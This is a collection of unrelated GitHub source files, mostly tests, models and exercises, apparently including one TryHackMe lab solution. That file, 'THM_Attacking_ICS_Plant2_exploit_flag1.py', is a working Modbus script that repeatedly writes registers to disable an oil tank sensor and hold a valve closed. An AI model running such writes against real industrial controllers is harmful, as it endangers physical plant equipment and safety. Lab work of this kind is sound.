"sutee.s@gmail.com"
] |
sutee.s@gmail.com
|
0ebb921c93ea58f0e08f06055eee26fd99f1b460
|
754772a0854759f6e23c3df05902c8b5954cf1da
|
/tests/test_misc.py
|
08123ce218318574bed13e76a81478db9dbcc493
|
[
"BSD-3-Clause"
] |
permissive
|
jmosbacher/straxen
|
8d5bd0d62d547ce7fa2bd61e0ae9b92b5c9446c2
|
ffcf06ad86471caf11cc831f2ff68d70b59464af
|
refs/heads/master
| 2022-11-03T03:06:08.159677
| 2022-03-17T09:39:58
| 2022-03-17T09:39:58
| 240,460,464
| 0
| 0
|
BSD-3-Clause
| 2020-02-14T08:21:55
| 2020-02-14T08:21:54
| null |
UTF-8
|
Python
| false
| false
| 2,356
|
py
|
from straxen.misc import TimeWidgets, print_versions
import straxen
import unittest
def test_widgets():
tw = TimeWidgets()
wig = tw.create_widgets()
start, end = tw.get_start_end()
assert isinstance(start, int) and isinstance(end, int), "Should have returned unix time in ns as integer!"
assert end > start, "By default end should be larger than start"
# Now manually change time zone and compare:
wig.children[0].children[0].value = 1
start_utc, end_utc = tw.get_start_end()
h_in_ns_unix = 60*60*10**9
assert (start_utc - start == h_in_ns_unix
or start_utc - start == 2 * h_in_ns_unix
or start_utc - start == 0 * h_in_ns_unix)
assert (start_utc - end == h_in_ns_unix
or start_utc - end == 2 * h_in_ns_unix
or start_utc - end == 0 * h_in_ns_unix)
def test_change_in_fields():
tw = TimeWidgets()
wig = tw.create_widgets()
start, end = tw.get_start_end()
# Modify the nano-second value:
wig.children[1].children[2].value = '20'
wig.children[2].children[2].value = '20'
start20, end20 = tw.get_start_end()
assert start20 - start == 20, 'Start nano-second field did not update.'
assert end20 - end == 20, 'End nano-second field did not update.'
# Modify Minutes:
time = wig.children[1].children[1].value
minutes = int(time[-2:])
minutes *= 60*10**9
wig.children[1].children[1].value = time[:-2] + '00' # .value is a string "HH:MM"
start00, _ = tw.get_start_end()
assert start20 - start00 == minutes, 'Time field did not update its value!'
def test_print_versions(modules=('numpy', 'straxen', 'non_existing_module')):
for return_string in [True, False]:
for include_git in [True, False]:
res = print_versions(modules,
return_string=return_string,
include_git=include_git)
if return_string:
assert res is not None
class HitAmplitude(unittest.TestCase):
def test_non_existing(self):
with self.assertRaises(ValueError):
straxen.hit_min_amplitude('non existing key')
@staticmethod
def test_get_hit_amplitude():
straxen.hit_min_amplitude('pmt_commissioning_initial')
straxen.hit_min_amplitude('pmt_commissioning_initial_he')
|
[
"noreply@github.com"
] |
jmosbacher.noreply@github.com
|
42bff62307ce3d225abc5165888a0afa1c81c20f
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_337/ch168_2020_06_21_16_37_43_552715.py
|
c908bf4827594b2f54867234292d854591578d23
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
def login_disponivel(login, lista):
if not login in lista:
return login
else:
i = 1
while True:
login2 = login+str(i)
if not login2 in lista:
return login2
i+=1
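# Illustrative sketch (not part of the original exercise): quick sanity checks of the helper.
if __name__ == "__main__":
    assert login_disponivel("bia", ["ana"]) == "bia"                    # a free login is returned unchanged
    assert login_disponivel("ana", ["ana", "ana1", "ana2"]) == "ana3"   # first free numbered variant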
|
[
"you@example.com"
] |
you@example.com
|
94f45669243390528d13a80da5a3eea3cc91fd1b
|
e3170e1efe723d8fa0092445167e9f77d60faf83
|
/THM_Attacking_ICS_Plant2_exploit_flag1.py
|
9334b7a9b44f9d7cade98f4545340828b4f34c29
|
[] |
no_license
|
Pri3st/Exploit-Scripts
|
18dad047342ec5b97c98b9827842a5878addd925
|
311a1c606c77aa479bf7a7641b8635bea7537a6c
|
refs/heads/main
| 2023-03-26T05:30:06.610217
| 2021-03-23T08:41:07
| 2021-03-23T08:41:07
| 304,022,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 420
|
py
|
#!/usr/bin/env python3
import sys
import time
from pymodbus.client.sync import ModbusTcpClient as ModbusClient
from pymodbus.exceptions import ConnectionException
ip = sys.argv[1]
client = ModbusClient(ip, port=502)
client.connect()
while True:
client.write_register(1, 1) # Keep the flow open
client.write_register(2, 0) # Disable oil tank sensor
client.write_register(3, 0) # Keep the oil tank valve closed
|
[
"noreply@github.com"
] |
Pri3st.noreply@github.com
|
1ea40e6f89b43f374cb8c40d8ed087f373e505a9
|
d5b6fe924aa18628ece256950680615a23c01f63
|
/src/ripa_archive/documents/models.py
|
ea7c62908acca488841d20de25bbf127fcfc5617
|
[] |
no_license
|
sysint64/ripa_archive
|
ba7c518d534eb5061b4ce42cb53f1c05fa207441
|
c9a7340c68efca44220a234781e250ec6b79209f
|
refs/heads/master
| 2021-05-15T03:33:38.364342
| 2018-05-14T16:48:26
| 2018-05-14T16:48:26
| 107,300,580
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,168
|
py
|
import os
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from ripa_archive.accounts.models import User
from ripa_archive.documents.validators import NAME_MAX_LENGTH
from ripa_archive.permissions import codes
from ripa_archive.permissions.models_abstract import ModelCustomPermission, ModelWhichHaveCustomPermissionsMixin
class FoldersManager(models.Manager):
    ALREADY_EXIST_ERROR = _('Folder with name "%s" already exists in this folder')
def get_by_path(self, path):
parent_folder = self.filter(name="Root", parent=None).first()
if path is None:
return parent_folder
folders_names = path.split("/")
for folder_name in folders_names:
parent_folder = self.filter(name=folder_name, parent=parent_folder).first()
if parent_folder is None:
return None
return parent_folder
def exist_with_name(self, parent, name, instance=None):
qs = self.get_queryset().filter(parent=parent, name__iexact=name)
if instance is not None:
qs = qs.exclude(pk=instance.pk)
return qs.count() > 0
def for_user(self, user, folder=None):
queryset = self.get_queryset()
if user is None or user.group is None:
return queryset.none()
if folder is not None:
if not folder.is_user_has_permission(user, codes.FOLDERS_CAN_READ):
return queryset.none()
return queryset.filter(parent=folder)
else:
if not user.group.has_permission(codes.FOLDERS_CAN_READ):
return queryset.none()
return queryset
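# Illustrative note (not from the original app): Folder.objects.get_by_path(None) returns the
# top-level "Root" folder, while get_by_path("a/b") walks Root -> a -> b one segment at a
# time and returns None as soon as a segment is missing, e.g.
#   Folder.objects.get_by_path("Contracts/2018")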
class DocumentsManager(models.Manager):
    ALREADY_EXIST_ERROR = _('Document with name "%s" already exists in this folder')
def exist_with_name(self, parent, name, instance=None):
qs = self.get_queryset().filter(parent=parent, name__iexact=name)
if instance is not None:
qs = qs.exclude(pk=instance.pk)
return qs.count() > 0
def for_user(self, user, folder=None):
queryset = self.get_queryset()
if user is None or user.group is None:
return queryset.none()
if folder is not None:
if not folder.is_user_has_permission(user, codes.FOLDERS_CAN_READ):
return queryset.none()
return queryset.filter(parent=folder)
else:
if not user.group.has_permission(codes.DOCUMENTS_CAN_READ):
return queryset.none()
return queryset
class FolderCustomPermission(ModelCustomPermission):
for_instance = models.ForeignKey("Folder")
class DocumentCustomPermission(ModelCustomPermission):
for_instance = models.ForeignKey("Document")
# Default folders: root and none
class Folder(ModelWhichHaveCustomPermissionsMixin, models.Model):
class Meta:
default_related_name = "folders"
content_type = "documents.Folder"
custom_permission_model = FolderCustomPermission
parent = models.ForeignKey('Folder', null=True, blank=True)
name = models.CharField(verbose_name=_("Name"), max_length=NAME_MAX_LENGTH)
objects = FoldersManager()
@property
def permalink(self):
if self.path != "":
return reverse("documents:index", kwargs={"path": self.path})
else:
return reverse("documents:index")
@property
def archive_permalink(self):
if self.path != "":
return reverse("documents:archive", kwargs={"path": self.path})
else:
return reverse("documents:archive")
@property
def path_folders(self):
items = [self]
current_folder = self.parent
while current_folder is not None:
items = [current_folder] + items
current_folder = current_folder.parent
print(current_folder)
return items
@property
def path(self):
folders = self.path_folders
# Remove root folder
if len(folders) >= 1 and folders[0].parent is None and folders[0].name == "Root":
folders = folders[1:]
return "/".join([str(folder) for folder in folders])
@property
def breadcrumbs(self):
items = []
for folder in self.path_folders:
items.append({"name": folder.name, "permalink": folder.permalink})
return items
@property
def archive_breadcrumbs(self):
items = []
for folder in self.path_folders:
items.append({"name": folder.name, "permalink": folder.archive_permalink})
return items
def __str__(self):
return self.name
class Document(ModelWhichHaveCustomPermissionsMixin, models.Model):
class Meta:
default_related_name = "documents"
class Status:
OPEN = "0"
IN_PROGRESS = "1"
PROJECT = "2"
FINAL = "3"
CLOSE = "4"
FORM_CHOICES = (
(OPEN, _("Open")),
# (IN_PROGRESS, "In progress"),
(PROJECT, _("Project")),
(FINAL, _("Final")),
(CLOSE, _("Close")),
)
ALL_CHOICES = (
(OPEN, _("Open")),
(IN_PROGRESS, _("In progress")),
(PROJECT, _("Project")),
(FINAL, _("Final")),
(CLOSE, _("Close")),
)
content_type = "documents.Document"
custom_permission_model = DocumentCustomPermission
name = models.CharField(max_length=NAME_MAX_LENGTH, default="No name")
owner = models.ForeignKey(User, null=True, related_name="owner")
contributors = models.ManyToManyField(User, related_name="contributors")
followers = models.ManyToManyField(User, related_name="followers")
data = models.OneToOneField("DocumentData", null=True, default=None)
current_edit_meta = models.ForeignKey("DocumentEditMeta", null=True, default=None)
accepted_edit_meta = models.ForeignKey("DocumentEditMeta", null=True, default=None, related_name="accepted_edit_meta")
parent = models.ForeignKey(Folder)
status = models.CharField(verbose_name=_("Status"), max_length=2, default=Status.OPEN, choices=Status.FORM_CHOICES)
objects = DocumentsManager()
def _reverse(self, urlname, kwargs=None):
if self.data is None:
return ""
if kwargs is None:
kwargs = {}
if self.parent.path != "":
kwargs.update({"path": self.parent.path, "name": self.name})
else:
kwargs.update({"name": self.name})
return reverse("documents:" + urlname, kwargs=kwargs)
@property
def status_str(self):
return dict(Document.Status.ALL_CHOICES).get(self.status, "Undefined")
@property
def permalink(self):
return self._reverse("document")
@property
def last_version_file_permalink(self):
return self._reverse("last-version-file")
@property
def upload_new_version_permalink(self):
return self._reverse("upload-new-version")
def data_permalink(self, data):
return self._reverse("get-file", kwargs={"version": data.pk})
@property
def last_data(self):
return DocumentData.objects.filter(document=self).order_by("-datetime").last()
@property
def path(self):
if self.parent.path != "":
return self.parent.path + "/" + self.name
else:
return self.name
@property
def is_under_edition(self):
return self.current_edit_meta is not None
def __str__(self):
return self.name
class DocumentType:
FILE = "0"
TEXT = "1"
WORD = "2"
PDF = "3"
SOUND = "4"
EXCEL = "5"
ARCHIVE = "6"
IMAGE = "7"
VIDEO = "8"
POWERPOINT = "9"
EXTENSIONS = (
(TEXT, ("txt",)),
(PDF, ("pdf",)),
(SOUND, ("mp3", "wav", "flac", "acc",)),
(ARCHIVE, ("7z", "zip", "rar", "tar", "gz",)),
(IMAGE, ("jpg", "jpeg", "png",)),
(VIDEO, ("avi", "mp4", "mpeg4", "3gp",)),
(WORD, ("doc", "docx",)),
(EXCEL, ("xls", "xlsx", "xlsb",)),
(POWERPOINT, ("ppt", "pptx",)),
)
@staticmethod
def get_type_from_name(name):
_, ext = os.path.splitext(name)
ext = ext[1:]
for type_extensions_pair in DocumentType.EXTENSIONS:
document_type, extensions = type_extensions_pair
if ext in extensions:
return document_type
return DocumentType.FILE
class DocumentData(models.Model):
class Meta:
default_related_name = "document_data_set"
document = models.ForeignKey(Document)
file = models.FileField(verbose_name=_("File"), upload_to="documents/")
datetime = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.file.name
@property
def filename(self):
return self.file.name.split("/")[-1]
@property
def type(self):
return DocumentType.get_type_from_name(self.file.name)
@property
def icon(self):
return {
DocumentType.FILE: "fa-file-o",
DocumentType.EXCEL: "fa-file-excel-o",
DocumentType.PDF: "fa-file-pdf-o",
DocumentType.SOUND: "fa-file-sound-o",
DocumentType.TEXT: "fa-file-text-o",
DocumentType.ARCHIVE: "fa-file-archive-o",
DocumentType.WORD: "fa-file-word-o",
DocumentType.IMAGE: "fa-file-image-o",
DocumentType.VIDEO: "fa-file-video-o",
DocumentType.POWERPOINT: "fa-file-powerpoint-o",
}.get(self.type, "fa-file-o")
@property
def permalink(self):
return self.document.data_permalink(self)
class DocumentEditMeta(models.Model):
class Status:
ACTIVE = '0'
ACCEPTED = '1'
REJECTED = '2'
editor = models.ForeignKey(User)
closed_by = models.ForeignKey(User, related_name="accepted_by", null=True)
start_datetime = models.DateTimeField(auto_now_add=True)
end_datetime = models.DateTimeField(null=True, default=None)
document = models.ForeignKey(Document)
previous_document_data = models.ForeignKey(DocumentData, null=True)
status = models.CharField(max_length=1, default=Status.ACTIVE)
@property
def is_accepted(self):
return self.status == DocumentEditMeta.Status.ACCEPTED
@property
def is_rejected(self):
return self.status == DocumentEditMeta.Status.REJECTED
@property
def is_active(self):
return self.status == DocumentEditMeta.Status.ACTIVE
@property
def time_spent(self):
return self.end_datetime - self.start_datetime
@property
def css_class(self):
return {
DocumentEditMeta.Status.ACCEPTED: " accepted",
DocumentEditMeta.Status.REJECTED: " rejected",
}.get(self.status, "")
class ActiveRemarkManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(edit_meta__status=DocumentEditMeta.Status.ACTIVE)
class Remark(models.Model):
class Status:
ACTIVE = '0'
ACCEPTED = '1'
REJECTED = '2'
FINISHED = '3'
class Meta:
ordering = ["-datetime"]
edit_meta = models.ForeignKey(DocumentEditMeta)
user = models.ForeignKey(User)
text = models.TextField()
datetime = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=1, default=Status.ACTIVE)
objects = models.Manager()
active_objects = ActiveRemarkManager()
@property
def is_accepted(self):
return self.status == Remark.Status.ACCEPTED
@property
def is_rejected(self):
return self.status == Remark.Status.REJECTED
@property
def is_finished(self):
return self.status == Remark.Status.FINISHED
@property
def is_active(self):
return self.status == Remark.Status.ACTIVE
@property
def css_class(self):
return {
Remark.Status.ACCEPTED: " accepted",
Remark.Status.REJECTED: " rejected",
Remark.Status.FINISHED: " finished",
}.get(self.status, "")
|
[
"andrey@kabylin.ru"
] |
andrey@kabylin.ru
|
d236bdab51964f1b98c45cd97d55bfe8fd1906dd
|
0ac82bac6bb500623eeddca565e3ea0191de072b
|
/python-scripts/flat_match.py
|
956dcd98118ac65a63c6ee4d1899f9f389c0387d
|
[
"MIT"
] |
permissive
|
CreateCodeLearn/flat-mate-matching
|
e665294ac1e79708fa52bbbbc6573e2abb78c697
|
1c4a4f03927dfc5f8d98b4db66b840a7ee847d7b
|
refs/heads/master
| 2020-03-15T12:16:16.257308
| 2018-05-24T08:20:28
| 2018-05-24T08:20:28
| 132,140,134
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,003
|
py
|
def flat_match (v_location,v_gender,v_rent,v_lowerage,v_upperage, filepath):
'''
Provides the dataset in CSV and based on input data uses booleans
to subset the data to give the flats ranked according rent with cheapest
showing first
'''
import pandas as pd
def transform_data(dataframe):
dd = dict()
index = dataframe.sort_values("rent").index.tolist()
for i in index:
dd[i] = dataframe.loc[i].to_dict()
return dd, index
data = pd.read_csv(filepath, index_col=0)
boolean_location = data["location"] == v_location
boolean_gender = data["gender"] == v_gender
boolean_rent = data["rent"] <= v_rent
boolean_upperage = data["lowerage"] >= v_lowerage
boolean_upperage = data["upperage"] <= v_upperage
user_constraints = boolean_location & boolean_gender & boolean_rent & boolean_lowerage & boolean_upperage
results = data.loc[user_constraints]
return transform_data(results)
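# Hypothetical call (the CSV path, filter values and age bounds below are
# illustrative assumptions, not taken from the original project):
#
#   flats, ranking = flat_match("Berlin", "female", 600, 20, 35, "data/flats.csv")
#   for flat_id in ranking:
#       print(flat_id, flats[flat_id]["rent"])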
|
[
"noreply@github.com"
] |
CreateCodeLearn.noreply@github.com
|
f570414052c45b26663ca047212e6d74bac2ae67
|
99411511cd49a3f0c1c2de7dc9cc65adac6b82b5
|
/tests/contracts/root_chain/test_respond_to_non_canonical_challenge.py
|
ea70d78d7e4571c15aaa1674d1dc7af349fa1e9e
|
[
"Apache-2.0"
] |
permissive
|
kevsul/plasma-contracts
|
f4b1a7b08d4b4fc4e62024c2f2c8794407c9c968
|
bf5ff1db154ba4807ac747430508f0e1aac1827a
|
refs/heads/master
| 2020-04-17T23:15:13.204840
| 2019-01-08T12:43:11
| 2019-01-08T12:43:11
| 167,028,074
| 0
| 0
| null | 2019-01-22T16:32:10
| 2019-01-22T16:32:09
| null |
UTF-8
|
Python
| false
| false
| 3,038
|
py
|
import pytest
from ethereum.tools.tester import TransactionFailed
def test_respond_to_non_canonical_challenge_should_succeed(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
testlang.forward_to_period(2)
testlang.respond_to_non_canonical_challenge(spend_id, owner_1.key)
in_flight_exit = testlang.get_in_flight_exit(spend_id)
assert in_flight_exit.bond_owner == owner_1.address
assert in_flight_exit.oldest_competitor == spend_id
assert not in_flight_exit.challenge_flag_set
def test_respond_to_non_canonical_challenge_wrong_period_should_fail(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
with pytest.raises(TransactionFailed):
testlang.respond_to_non_canonical_challenge(spend_id, owner_1.key)
def test_respond_to_non_canonical_challenge_not_older_should_fail(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
testlang.forward_to_period(2)
with pytest.raises(TransactionFailed):
testlang.respond_to_non_canonical_challenge(spend_id, owner_1.key)
def test_respond_to_non_canonical_challenge_invalid_proof_should_fail(testlang):
owner_1, owner_2, amount = testlang.accounts[0], testlang.accounts[1], 100
deposit_id = testlang.deposit(owner_1, amount)
spend_id = testlang.spend_utxo([deposit_id], [owner_1.key])
double_spend_id = testlang.spend_utxo([deposit_id], [owner_1.key], [(owner_1.address, 100)], force_invalid=True)
testlang.start_in_flight_exit(spend_id)
testlang.challenge_in_flight_exit_not_canonical(spend_id, double_spend_id, key=owner_2.key)
testlang.forward_to_period(2)
spend_tx = testlang.child_chain.get_transaction(spend_id)
proof = b''
with pytest.raises(TransactionFailed):
testlang.root_chain.respondToNonCanonicalChallenge(spend_tx.encoded, spend_id, proof)
|
[
"paulperegud@gmail.com"
] |
paulperegud@gmail.com
|
33a2b6d8f45d37885f4a4c19d96c4da8aeaf0512
|
403ec432fa5b6e5e8f516057517700defa69dbdf
|
/scripts/miyashita/rv_miyashita.py
|
82ad931b0bbcc23125020e70ea58e0d96dafbb73
|
[] |
no_license
|
takatoy/marl
|
a264d0cc7aef057f255a192c19feddb70d65a5e1
|
1f36e3432fd4150ce8acebc4aa0f31edde315e99
|
refs/heads/master
| 2022-12-24T06:27:14.712655
| 2019-08-16T12:46:25
| 2019-08-16T12:46:25
| 153,779,283
| 0
| 0
| null | 2022-12-08T05:50:24
| 2018-10-19T12:27:38
|
Python
|
UTF-8
|
Python
| false
| false
| 1,314
|
py
|
from agent.trainer import Trainer
from agent.util import EpsilonExponentialDecay
from marlenv.goldmine.relative import GoldmineRV
from marlenv.util import GoldmineRecorder
from agent.deepq.miyashita_dqn import MiyashitaDQN
agent_num = 6
task_num = 4
view_range = 3
env = GoldmineRV(agent_num, task_num, view_range)
env.seed(0)
params = {
'name' : 'rv_miyashita',
'episodes' : 40000,
'steps' : 200,
'no_op_episodes' : 100,
'epsilon' : EpsilonExponentialDecay(init=1.0, rate=0.9999),
'train_every' : 1,
'save_model_every' : 1000,
'is_centralized' : False,
'agent_num' : agent_num,
'env' : env,
'action_space' : env.action_space,
'observation_space' : env.observation_space,
'preprocess' : None,
'recorder' : GoldmineRecorder(agent_num),
'agent': [
MiyashitaDQN(
action_space = env.action_space,
observation_space = env.observation_space,
memory_size = 2000,
batch_size = 32,
learning_rate = 0.0001,
gamma = 0.99,
target_update = 200
) for _ in range(agent_num)
]
}
trainer = Trainer(**params)
trainer.train()
|
[
"takato.y7724@gmail.com"
] |
takato.y7724@gmail.com
|
d2f1ca8708def6c418e18082ca194d3ef9cbfc41
|
a83dcfb3c55f5d447aa9fd4ffe49b96dfb04a872
|
/euler_problem_115.py
|
ab5c35694d96e0d49de37f5ea28c07fcef45fe0b
|
[] |
no_license
|
SinghGauravKumar/Project-Euler-Python-Solutions
|
bb7590498c427d50446a6a0c57c0dd545c1db770
|
1664f51e89e4021048fbd1949a4622822a46c747
|
refs/heads/master
| 2020-02-26T17:00:20.303071
| 2016-07-11T15:47:47
| 2016-07-11T15:47:47
| 53,360,338
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 982
|
py
|
import itertools
# How many ways can a row n units long be filled, where red blocks are
# at least m units long? Denote this quantity as ways[n].
# Compute n = 0 manually as a base case.
#
# Now assume n >= 1. Look at the leftmost item and sum up the possibilities.
# - If the item is a black square, then the rest of the row is allowed
# to be anything of length n-1. Add ways[n-1].
# - If the item is a red block with length k where k >= m, then:
# - If k = n, then the whole row is filled by this red block. Add 1.
# - Otherwise k < n, this red block is followed by a black square, then followed
# by anything of length n-k-1. So add ways[n-m-1] + ways[n-m-2] + ... + ways[0].
def compute():
# Dynamic programming
M = 50
ways = [1]
for n in itertools.count(1):
s = ways[n - 1] + sum(ways[ : max(n - M, 0)])
if n >= M:
s += 1
ways.append(s)
if s > 1000000:
return str(n)
if __name__ == "__main__":
print(compute())
|
[
"goroo32@users.noreply.github.com"
] |
goroo32@users.noreply.github.com
|
2e7583da1b5353128ab7e08dcaadc791b41711b8
|
7616db78302026eca05e3064d237db5192be3440
|
/Testing.py
|
7a09dcbc2383ad054ce294a3dcb12458a662e872
|
[] |
no_license
|
MaartenMol/CSN_MiniProject
|
66cb9ac37e87061832a8123dbc7d2d96344bf174
|
fe52a902c6ced798fd548cc80ac5b81a8beaf6f9
|
refs/heads/master
| 2021-03-30T02:18:40.133190
| 2016-11-10T13:16:27
| 2016-11-10T13:16:27
| 117,237,636
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 901
|
py
|
import RPi.GPIO as gpio
from gpiozero import LED
from time import sleep
gpio.setmode(gpio.BCM)
gpio.setup(17, gpio.IN)
gpio.setup(27, gpio.IN)
gpio.setup(19, gpio.IN)
gpio.setup(5, gpio.IN)
gpio.setup(6, gpio.IN)
green = LED(4)
red = LED(26)
yellow = LED(22)
bolb = LED(13)
yellow.on()
systemActivted = False
while True:
input_knop1 = gpio.input(17)
input_knop2 = gpio.input(27)
input_knop3 = gpio.input(5)
input_knop4 = gpio.input(6)
input_motion = gpio.input(19)
if input_knop1 == True:
print('Systeem is geactiveerd!')
green.blink()
sleep(5)
systemActivted = True
green.off()
green.on()
if input_motion == True:
print('Beweging gedecteerd...')
if systemActivted == True:
authKey = input('Voer uw toegangscode in: ')
yellow.blink()
|
[
"MaartenMol96@users.noreply.github.com"
] |
MaartenMol96@users.noreply.github.com
|
763bc377b5aa603e4aec1dc21746813f46af06e9
|
a3614055b6c58b0f6aeabb77cb463f2503d77fa3
|
/demo/iconnector.py
|
f635497f9b11ec55bb4ef5a1c5ef79a2e96e62ca
|
[] |
no_license
|
ruarcs/iverifier
|
21d152909ae80c5eb0bbbc78d1dc594258cf9436
|
961639e7db9e63f304aba5746e3a7e9f02c1706e
|
refs/heads/master
| 2021-01-10T04:33:48.593703
| 2015-06-05T16:19:51
| 2015-06-05T16:19:51
| 36,872,414
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
from zope.interface import Interface
class IConnector(Interface):
def connect( port ):
"""Connect to the thing."""
|
[
"ruarcs@gmail.com"
] |
ruarcs@gmail.com
|
b4e7ae515980d8b17b6d2d43e99838f7887a26d1
|
ff2772718882aa6035edde3dc97371455513d96d
|
/CSCI466/code/program3/link_3.py
|
d2e99b87bb741bb66ce970527efa556ef8a8218c
|
[
"MIT"
] |
permissive
|
Dan-Laden/Dan-Laden-Projects
|
55eefa60f3a1bd5c1e51aa54ca0bab63c32a4e64
|
c9736e7baa25ef4f7272af462a956884605a1b40
|
refs/heads/master
| 2021-03-27T15:54:23.206820
| 2019-04-27T02:44:23
| 2019-04-27T02:44:23
| 55,929,569
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,637
|
py
|
'''
Created on Oct 12, 2016
@author: mwitt_000
'''
import queue
import threading
## An abstraction of a link between router interfaces
class Link:
## creates a link between two objects by looking up and linking node interfaces.
# @param from_node: node from which data will be transfered
# @param from_intf_num: number of the interface on that node
# @param to_node: node to which data will be transfered
# @param to_intf_num: number of the interface on that node
# @param mtu: link maximum transmission unit
def __init__(self, from_node, from_intf_num, to_node, to_intf_num, mtu):
self.from_node = from_node
self.from_intf_num = from_intf_num
self.to_node = to_node
self.to_intf_num = to_intf_num
self.in_intf = from_node.out_intf_L[from_intf_num]
self.out_intf = to_node.in_intf_L[to_intf_num]
#configure the linking interface MTUs
self.in_intf.mtu = mtu
self.out_intf.mtu = mtu
## called when printing the object
def __str__(self):
return 'Link %s-%d to %s-%d' % (self.from_node, self.from_intf_num, self.to_node, self.to_intf_num)
##transmit a packet from the 'from' to the 'to' interface
def tx_pkt(self):
pkt_S = self.in_intf.get()
if pkt_S is None:
return #return if no packet to transfer
if len(pkt_S) > self.out_intf.mtu:
print('%s: packet "%s" length greater then link mtu (%d)' % (self, pkt_S, self.out_intf.mtu))
return #return without transmitting if packet too big
#otherwise transmit the packet
try:
self.out_intf.put(pkt_S)
print('%s: transmitting packet "%s"' % (self, pkt_S))
except queue.Full:
print('%s: packet lost' % (self))
pass
## An abstraction of the link layer
class LinkLayer:
def __init__(self):
## list of links in the network
self.link_L = []
self.stop = False #for thread termination
##add a Link to the network
def add_link(self, link):
self.link_L.append(link)
##transfer a packet across all links
def transfer(self):
for link in self.link_L:
link.tx_pkt()
## thread target for the network to keep transmitting data across links
def run(self):
print (threading.currentThread().getName() + ': Starting')
while True:
#transfer one packet on all the links
self.transfer()
#terminate
if self.stop:
print (threading.currentThread().getName() + ': Ending')
return
|
[
"noreply@github.com"
] |
Dan-Laden.noreply@github.com
|
2ece9d6b3674f5b1dcc80ebda708f895af2fee70
|
57fd1088943c36f8283514d1b778c83af99ea054
|
/Python 1/Exemplos/Semana 2.py
|
a236823905f82e02efe55d59d07e2f8cd05b6fe9
|
[
"MIT"
] |
permissive
|
LourdesOshiroIgarashi/coursera-ime-usp
|
db6c36c8505bca9660718c94f96c552a9f595a0c
|
9e627acdf97fad834726e58eac8886663c8fa453
|
refs/heads/main
| 2023-06-20T10:39:56.670219
| 2021-07-21T06:26:32
| 2021-07-21T06:26:32
| 385,691,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
mae = input("Qual o nome da sua mãe?")
pai = input("Qual o nome do seu pai?")
print("Bom dia Sra.",mae, "! E bom dia Sr.",pai,"."
""
|
[
"lourdes.oshiro@ufms.br"
] |
lourdes.oshiro@ufms.br
|
2504fde45eeec1f9d902c49e883d0b81e107deb6
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-hss/huaweicloudsdkhss/v5/model/handle_method.py
|
d642224bff61bc6d689fecc1921ef1247b0c5800
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 2,294
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class HandleMethod:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
}
attribute_map = {
}
def __init__(self):
"""HandleMethod
The model defined in huaweicloud sdk
"""
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
